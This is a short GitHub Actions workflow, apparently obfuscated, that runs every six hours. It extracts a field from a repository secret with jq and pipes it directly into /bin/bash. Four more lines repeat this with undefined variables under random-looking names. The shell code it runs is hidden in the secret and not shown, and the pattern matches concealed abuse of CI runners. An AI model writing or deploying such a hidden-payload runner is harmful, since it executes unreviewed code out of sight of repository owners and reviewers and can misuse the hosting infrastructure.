name: fibergucci

on:
  workflow_dispatch:
  schedule:
    - cron: '44 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fibergucci
        env:
          kjkid72173: ${{ secrets.kjkid72173 }}
        run: |
          echo $kjkid72173 | jq -r .qhz2417 | /bin/bash
          echo $gik90444 | jq -r .oyt18 | /bin/bash
          echo $wetgt80 | jq -r .j072 | /bin/bash
          echo $te9126 | jq -r .ffaa3 | /bin/bash
          echo $dc9423 | jq -r .zwr2 | /bin/bash

